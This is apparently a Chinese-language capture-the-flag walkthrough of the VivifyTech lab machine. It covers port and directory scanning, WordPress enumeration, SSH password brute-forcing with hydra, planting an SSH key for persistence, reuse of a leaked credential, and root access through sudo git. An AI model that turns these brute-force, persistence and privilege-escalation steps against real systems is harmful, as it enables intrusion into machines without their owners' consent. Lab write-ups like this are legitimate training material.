• VivifyTech - hackmyvm


    简介

    靶机名称:VivifyTech

    难度:简单

    靶场地址:https://hackmyvm.eu/machines/machine.php?vm=VivifyTech

    本地环境

    虚拟机:vitual box

    靶场IP(VivifyTech):192.168.56.119

    跳板机IP(windows 11):192.168.56.1 192.168.190.100

    渗透机IP(kali):192.168.190.131

    扫描

    nmap起手

    nmap -sT -p0- 192.168.56.119 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
    nmap -sT -sV -sC -O -p$ports 192.168.56.119 -oA nmapscan/detail
    
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-16 09:31 EDT
    Nmap scan report for 192.168.56.119
    Host is up (0.00034s latency).
    
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
    | ssh-hostkey:
    |   256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
    |_  256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
    80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
    |_http-title: Apache2 Debian Default Page: It works
    |_http-server-header: Apache/2.4.57 (Debian)
    3306/tcp  open  mysql   MySQL (unauthorized)
    33060/tcp open  mysqlx?
    | fingerprint-strings:
    |   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
    |     Invalid message"
    |     HY000
    |   LDAPBindReq:
    |     *Parse error unserializing protobuf message"
    |     HY000
    |   oracle-tns:
    |     Invalid message-frame."
    |_    HY000
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: WAP
    Running: Actiontec embedded, Linux
    OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel
    OS details: Actiontec MI424WR-GEN3I WAP
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 18.68 seconds
    

    经典22和80。暴露了mysql服务在外面,因为有33060这个扩展端口,所以版本起码在8.0以上

    http服务

    啥啊这是……连个站都没了

    image-20240616213818420

    随便目录扫描一下,好家伙直接全部爆出来了

    feroxbuster -u http://192.168.56.119/ -t 20 -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt  -C 500  -d 3
    
     ___  ___  __   __     __      __         __   ___
    |__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
    |    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
    by Ben "epi" Risher 🤓                 ver: 2.10.3
    ───────────────────────────┬──────────────────────
     🎯  Target Url            │ http://192.168.56.119/
     🚀  Threads               │ 20
     📖  Wordlist              │ /home/kali/1_Tool/1_HVV/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt
     💢  Status Code Filters   │ [500]
     💥  Timeout (secs)        │ 7
     🦡  User-Agent            │ feroxbuster/2.10.3
     💉  Config File           │ /etc/feroxbuster/ferox-config.toml
     🔎  Extract Links         │ true
     🏁  HTTP methods          │ [GET]
     🔃  Recursion Depth       │ 3
     🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
    ───────────────────────────┴──────────────────────
     🏁  Press [ENTER] to use the Scan Management Menu™
    ──────────────────────────────────────────────────
    404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
    403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
    200      GET       24l      127w    10359c http://192.168.56.119/icons/openlogo-75.png
    301      GET        9l       28w      320c http://192.168.56.119/wordpress => http://192.168.56.119/wordpress/
    200      GET      368l      933w    10701c http://192.168.56.119/
    301      GET        9l       28w      332c http://192.168.56.119/wordpress/wp-includes => http://192.168.56.119/wordpress/wp-includes/
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/widgets.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/l10n.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/plugin.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/fonts.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-taxonomy.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-role.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-walker.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-tax-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-error.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-type.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-hook.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-list-util.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-site-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-oembed-controller.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-template-utils.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-schema.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wpdb.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-streams.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-widgets.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/link-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/option.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-default-constants.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/general-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/bookmark.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-paused-extensions-storage.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-duotone.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/cache-compat.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/functions.wp-styles.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/category.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/shortcodes.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rss-functions.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-image-editor.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user-request.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-classic-to-block-menu-converter.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-phpass.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-site.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/nav-menu.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-supports.php
    200      GET        1l        4w       29c http://192.168.56.119/wordpress/wp-includes/ms-files.php
    301      GET        9l       28w      331c http://192.168.56.119/wordpress/wp-content => http://192.168.56.119/wordpress/wp-content/
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/error-protection.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-network.php
    200      GET       48l       48w      439c http://192.168.56.119/wordpress/wp-includes/secrets.txt
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-term-query.php
    301      GET        9l       28w      339c http://192.168.56.119/wordpress/wp-content/uploads => http://192.168.56.119/wordpress/wp-content/uploads/
    301      GET        9l       28w      339c http://192.168.56.119/wordpress/wp-content/plugins => http://192.168.56.119/wordpress/wp-content/plugins/
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-thumbnail-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/pluggable-deprecated.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/author-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-key-service.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/pluggable.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser-frame.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/kses.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-link-service.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-locale-switcher.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-comment.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme-templates.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-load.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-requests.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-functions.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/comment.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/bookmark-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-resolver.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-navigation-fallback.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-meta-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-manager.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-patterns-registry.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/user.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/global-styles-and-settings.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-widget-factory.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-encoding.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/wp-db.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/load.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-nav-menus.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-date-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/revision.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-editor-context.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/embed.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/taxonomy.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-pattern-categories-registry.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-ajax-response.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-post.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rewrite.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-application-passwords.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/formatting.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser-block.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-curl.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/atomlib.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme-previews.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/sitemaps.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-comment-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-cookie.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/feed.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-matchesmapregex.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-post-type.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-locale.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/deprecated.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-metadata-lazyloader.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/blocks.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/comment-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/capabilities.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-editor.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/default-constants.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/http.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/compat.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-dependency.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rest-api.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-widget.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-feed-cache-transient.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-object-cache.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-rewrite.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-data.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-network.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-proxy.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/https-detection.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/category-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-email-service.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/robots-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-roles.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-cookie-service.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-dependencies.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-phpmailer.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-admin-bar.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/admin-bar.php
    200      GET       86l      145w     1151c http://192.168.56.119/wordpress/wp-includes/theme-i18n.json
    200      GET       17l       41w      316c http://192.168.56.119/wordpress/wp-includes/block-i18n.json
    200      GET      326l      708w     7303c http://192.168.56.119/wordpress/wp-includes/theme.json
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-textdomain-registry.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-fatal-error-handler.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-list.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/functions.wp-scripts.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-network-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-embed.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/https-migration.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-pop3.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-session-tokens.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-type-registry.php
    301      GET        9l       28w      338c http://192.168.56.119/wordpress/wp-content/themes => http://192.168.56.119/wordpress/wp-content/themes/
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/canonical.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/version.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/style-engine.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-styles-registry.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-term.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-response.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/media-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-editor.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-formats.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-deprecated.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-site.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/cron.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-oembed.php
    301      GET        9l       28w      329c http://192.168.56.119/wordpress/wp-admin => http://192.168.56.119/wordpress/wp-admin/
    301      GET        9l       28w      334c http://192.168.56.119/wordpress/wp-admin/user => http://192.168.56.119/wordpress/wp-admin/user/
    301      GET        9l       28w      337c http://192.168.56.119/wordpress/wp-admin/network => http://192.168.56.119/wordpress/wp-admin/network/
    301      GET        9l       28w      333c http://192.168.56.119/wordpress/wp-admin/css => http://192.168.56.119/wordpress/wp-admin/css/
    301      GET        9l       28w      338c http://192.168.56.119/wordpress/wp-admin/includes => http://192.168.56.119/wordpress/wp-admin/includes/
    

    知道是wordpress后,使用wpscan扫一下

    wpscan --url http://192.168.56.119/wordpress --api-token=VjtWw...
    
    _______________________________________________________________
             __          _______   _____
             \ \        / /  __ \ / ____|
              \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
               \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
                \  /\  /  | |     ____) | (__| (_| | | | |
                 \/  \/   |_|    |_____/ \___|\__,_|_| |_|
    
             WordPress Security Scanner by the WPScan Team
                             Version 3.8.25
           Sponsored by Automattic - https://automattic.com/
           @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________
    
    [+] URL: http://192.168.56.119/wordpress/ [192.168.56.119]
    [+] Started: Mon Jun 17 00:01:26 2024
    
    Interesting Finding(s):
    
    [+] Headers
     | Interesting Entry: Server: Apache/2.4.57 (Debian)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%
    
    [+] XML-RPC seems to be enabled: http://192.168.56.119/wordpress/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
     |  - http://codex.wordpress.org/XML-RPC_Pingback_API
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
     |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
    
    [+] WordPress readme found: http://192.168.56.119/wordpress/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [+] Upload directory has listing enabled: http://192.168.56.119/wordpress/wp-content/uploads/
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [+] The external WP-Cron seems to be enabled: http://192.168.56.119/wordpress/wp-cron.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 60%
     | References:
     |  - https://www.iplocation.net/defend-wordpress-from-ddos
     |  - https://github.com/wpscanteam/wpscan/issues/1299
    
    [+] WordPress version 6.4.1 identified (Insecure, released on 2023-11-09).
     | Found By: Rss Generator (Passive Detection)
     |  - http://192.168.56.119/wordpress/index.php/feed/, https://wordpress.org/?v=6.4.1
     |  - http://192.168.56.119/wordpress/index.php/comments/feed/, https://wordpress.org/?v=6.4.1
     |
     | [!] 4 vulnerabilities identified:
     |
     | [!] Title: WP 6.4-6.4.1 - POP Chain
     |     Fixed in: 6.4.2
     |     References:
     |      - https://wpscan.com/vulnerability/2afcb141-c93c-4244-bde4-bf5c9759e8a3
     |      - https://fenrisk.com/publications/blogpost/2023/11/22/gadgets-chain-in-wordpress/
     |
     | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
     |     Fixed in: 6.4.3
     |     References:
     |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
     |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
     |
     | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
     |     Fixed in: 6.4.3
     |     References:
     |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
     |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
     |
     | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
     |     Fixed in: 6.4.4
     |     References:
     |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
     |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
    
    [+] WordPress theme in use: twentytwentyfour
     | Location: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/
     | Last Updated: 2024-04-02T00:00:00.000Z
     | Readme: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/readme.txt
     | [!] The version is out of date, the latest version is 1.1
     | [!] Directory listing is enabled
     | Style URL: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/style.css
     | Style Name: Twenty Twenty-Four
     | Style URI: https://wordpress.org/themes/twentytwentyfour/
     | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
     | Author: the WordPress team
     | Author URI: https://wordpress.org
     |
     | Found By: Urls In Homepage (Passive Detection)
     |
     | Version: 1.0 (80% confidence)
     | Found By: Style (Passive Detection)
     |  - http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'
    
    [+] Enumerating All Plugins (via Passive Methods)
    
    [i] No plugins Found.
    
    [+] Enumerating Config Backups (via Passive and Aggressive Methods)
     Checking Config Backups - Time: 00:00:00 <==============> (137 / 137) 100.00% Time: 00:00:00
    
    [i] No Config Backups Found.
    
    [+] WPScan DB API OK
     | Plan: free
     | Requests Done (during the scan): 2
     | Requests Remaining: 23
    
    [+] Finished: Mon Jun 17 00:01:33 2024
    [+] Requests Done: 174
    [+] Cached Requests: 5
    [+] Data Sent: 48.24 KB
    [+] Data Received: 307.614 KB
    [+] Memory used: 256.867 MB
    [+] Elapsed time: 00:00:07
    
    

    信息收集-爆破

    后面对着主题和版本找了半天poc,无果。回头又找了一圈,发现有一个secret.txt

    image-20240617122816733

    怎么说呢,放在这种目录下,还真是恶趣味。

    根据这个作者的思路,接下来去收集用户。除了主页外,还有上面发布的文章The story behind VivifyTech,合起来如下

    sancelisso
    Sarah
    Mark
    Jake
    Alex
    

    使用用户名枚举脚本扩充一遍

    from datetime import datetime
    import argparse
    
    def generate_additional_combinations(parts):
        print(parts)
        combinations = set()
        # 如果名字由名和姓组成(两部分),生成特定格式
        if len(parts) == 2:
            # A全小写B首字母小写的情况
            combinations.add(parts[0].lower() + parts[1][0].lower() + parts[1][1:])
            combinations.add(parts[0].lower() + parts[1][0].lower())
            combinations.add(parts[0].upper() + parts[1][0].upper())
    
            combinations.add(parts[1].lower() + parts[0][0].lower())
            combinations.add(parts[1].upper() + parts[0][0].upper())
        print("combinations = > ",combinations)
        return combinations
    
    def generate_usernames(usernames):
        generated_usernames = set()
        for name in usernames:
            parts = name.split()  # 按空格分割
            if '.' in name:
                parts = name.split('.')  # 按点号分割
    
            # 常见的用户名组合
            generated_usernames.add(name.lower())  # 全小写
            generated_usernames.add(name.upper())  # 全大写
            generated_usernames.add(''.join(part[0] for part in parts).lower())  # 首字母小写组合
            generated_usernames.add('.'.join(parts).lower())  # 点连接小写
    
            # 特殊的用户名组合
            generated_usernames.update(generate_additional_combinations(parts))
    
        return sorted(generated_usernames)
    
    def read_usernames(filename):
        with open(filename, 'r') as file:
            return [line.strip() for line in file if line.strip()]
    
    def main():
        parser = argparse.ArgumentParser(description='Generate possible usernames.')
        parser.add_argument('-f', '--input-file', required=True, help='Input file containing a list of usernames.')
        parser.add_argument('-o', '--output-file', default='output.txt', help='Output file for possible usernames.')
    
        args = parser.parse_args()
    
        usernames = read_usernames(args.input_file)
        new_usernames = generate_usernames(usernames)
        with open(args.output_file, 'w') as file:
            for username in new_usernames:
                file.write(username + '\n')
    
        print(f"Username combinations have been written to {args.output_file}")
    
    if __name__ == "__main__":
        main()
    
    ALEX
    JAKE
    MARK
    SANCELISSO
    SARAH
    a
    alex
    j
    jake
    m
    mark
    s
    sancelisso
    sarah
    

    首先用bp爆破wordpress后台,无果

    然后试着用hydra爆ssh,成功爆出账密为sarah/bohicon

    hydra -t 8 -L user.txt -P secrets.txt 192.168.56.119 ssh -I

    image-20240617131605305

    成功得到在用户目录下得到user.txt

    image-20240617131733870

    HMV{Y0u_G07_Th15_0ne_6543}

    提权

    先把攻击机的ssh公钥传上去维权

    ssh-keygen
    cd .ssh
    echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" >> authorized_keys
    

    先传个linpeas_fat.sh上去探路

    ❯ scp ./lin_fat.sh sarah@192.168.56.119:/tmp/
    lin_fat.sh                                                  100%   25MB  50.8MB/s   00:00
    

    然后发现配置文件中有数据库的配置信息

    image-20240617133505801

    然后就没法子了,解不开()

    mysql> select * from wp_users;
    +----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
    | ID | user_login | user_pass                          | user_nicename | user_email         | user_url                         | user_registered     | user_activation_key | user_status | display_name |
    +----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
    |  1 | sancelisso | $P$BPhGmUp9fmz6VHYL1FOPr33qtX.yyf1 | sancelisso    | test@localhost.com | http://192.168.177.133/wordpress | 2023-12-05 20:50:42 |                     |           0 | sancelisso   |
    +----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
    

    然后回到用户目录再看一眼,发现隐藏文件中有一个并不是默认文件夹

    image-20240617140032611

    里面有一个文件Tasks.txt

    sarah@VivifyTech:~/.private$ cat Tasks.txt
    - Change the Design and architecture of the website
    - Plan for an audit, it seems like our website is vulnerable
    - Remind the team we need to schedule a party before going to holidays
    - Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N
    

    得到账密为gbodja:4Tch055ouy370N

    sudo -l提权

    登录新用户后,起手sudo -l,看到有权限执行git

    gbodja@VivifyTech:/home/sarah/.private$ sudo -l
    Matching Defaults entries for gbodja on VivifyTech:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_pty
    
    User gbodja may run the following commands on VivifyTech:
        (ALL) NOPASSWD: /usr/bin/git
    

    在gtfobins上详细描述了所有git提权到shell的方法

    image-20240617140312232

    这里我选择了b。首先输入 sudo /usr/bin/git help config,然后输入!/bin/bash即可得到root权限

    image-20240617140347541

    image-20240617140457614

    HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

    结束

  • 相关阅读:
    怎么给PDF添加页面?推荐三个PDF如何插入页面小妙招
    springboot足球运动员训练计划管理系统的设计与实现毕业设计源码281444
    羽夏看Linux内核——环境搭建
    求助大佬——期末考试评分标准(浙大)C语言
    Sectigo https证书
    基于docker commit和Dockerfile为镜像添加ssh服务
